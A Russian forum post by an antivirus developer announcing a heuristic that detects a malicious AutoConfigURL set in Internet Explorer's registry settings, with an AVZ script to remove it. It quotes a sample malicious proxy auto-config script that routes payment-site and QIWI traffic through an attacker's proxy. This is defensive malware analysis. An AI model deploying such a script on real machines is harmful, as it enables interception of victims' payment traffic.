Jump to content
Sign in to follow this  
Zaitsev Oleg

Новый эвристик для AutoConfigURL

Recommended Posts

В свежем обновлении баз появилась эвристика, которая проверяет, не задан ли в настройках IE URL для авто настройки. Причина создания эвристики - за последние пару дней я получил массу сообщений о том, что без видимой причины начинает сбоить доступ ПК в Интернет, причем основная масса сообщений получена от администраторов корпоративных сетей, в которых используются прокси-сервера.

В логе срабатывание эвристики выглядит так:

Найден URL автонастройки браузера IE ветка_пользователя_в_HKUS\Software\Microsoft\Windows\CurrentVersion\Internet Settings, AutoConfigURL="найденный URL"

 

Курсивом выделены изменяющиеся части сообщения, проверка ведется по всем доступным ключам реестра в HKEY_USERS. Сейчас наблюдается всплеск активности зловреда, который вносит в настройку браузера ссылку на лежащий где-то в Интернет скрипт, причем доступ к скрипту конфигурации может производиться по HTTPS протоколу. Пример зловредного скрипта:

function FindProxyForURL(url,host)
{
var P = "PROXY xxx.xxx.xxx.xxx:8012";
if (url.substring(0, 25) == "https://retail.payment.ru")
  {
   return P;
  }
if (shExpMatch(host,"*.qiwi.*"))
  {
   return P;
  }
return "DIRECT";
}

Как несложно заметить, в результате запросы к retail.payment.ru и qiwi.* уйдут на прокси создателей зловреда. Вторая опасная особенность состоит в том, что скрипт конфигурации не хранится локально на пораженном ПК, он подгружается с заданного URL и как следствие, текст скрипта может меняться. Скрипт принимает решение для каждого URL, как следствие на ПК с прямым доступом в Интернет заметить аномалии в работе IE невозможно. Как несложно заметить, в случае доступа в Интернет через прокси-сервер скрипт нарушит работу за счет return "DIRECT";

 

Удалить троянскую автонастройку можно посредством скрипта AVZ:

begin
// Для текущего пользователя
RegKeyParamDel('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings', 'AutoConfigURL');
// Для ветки ".DEFAULT" в HKEY_USERS
RegKeyParamDel('HKEY_USERS', '.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings', 'AutoConfigURL');
end.

Share this post


Link to post
Sign in to follow this  

×
×
  • Create New...

Important Information

We use cookies to make your experience of our websites better. By using and further navigating this website you accept this. Detailed information about the use of cookies on this website is available by clicking on more information.